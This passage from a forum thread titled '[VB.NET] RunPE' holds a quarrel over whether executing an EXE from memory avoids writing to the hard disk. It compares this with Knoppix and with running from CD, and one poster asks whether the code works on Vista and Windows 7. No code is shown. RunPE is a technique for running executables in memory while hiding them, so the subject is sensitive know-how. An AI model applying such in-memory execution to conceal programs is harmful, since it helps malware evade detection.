    @ "and when running an EXE from CD, you can use a MemoryStream to save files."
    and why would i want to save files??? what are you talking about?

    @ "how do you think Knoppix works?"
    i think it uses a virtual ram device, but if it doesnt, it doesnt matter because that isnt the topic now, ho knoppix works
    By that I mean that "you can still read and write to the hard drive, no matter where you're running from". Knoppix can access your hard drive, and it still runs entirely from memory - I wonder how that works? (sarcasm, BTW)

    @ "and when running an EXE from CD, you can use a MemoryStream to save files."
    and why would i want to save files??? what are you talking about?
    And yes, it Does prevent from touching the harddisk! Why is that still unclear to you?
    To your question, why not to run it from cd then... There are still some cd drives which can only read but not write and imagine now on such a pc, hmm let me think, we want to recover some deleted files!
    I think you just answered your own question there.

  25. #25
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by minitech View Post
    By that I mean that "you can still read and write to the hard drive, no matter where you're running from". Knoppix can access your hard drive, and it still runs entirely from memory - I wonder how that works? (sarcasm, BTW)




    I think you just answered your own question there.
    I still dont understand you, really, what i'm "trying to do" in my example is, to avoid writing to the hard drive. SURE i CAN read and write, but i dont HAVE TO write to harddsik with this method, for executing an exe. So why do you tell me that i can interact with the harddisk?? i never told the opposite!?

    Also Knoppix doesnt need to have acces the harddsik, once it runs and i also never said, that konppix or any program can't acces the harddsik. What are you talking about? (no sarcasm, btw)

  26. #26
    Stack Overflow mod​erator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    ... wow. What I'm saying is that running from CD is pretty much exactly the same. Except you can't take out the CD.

  27. #27
    Lively Member
    Join Date
    Jan 2010
    Posts
    124

    Re: [VB.NET] RunPE

    Have anyone here successfully made this code work for vista and/or windows 7?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width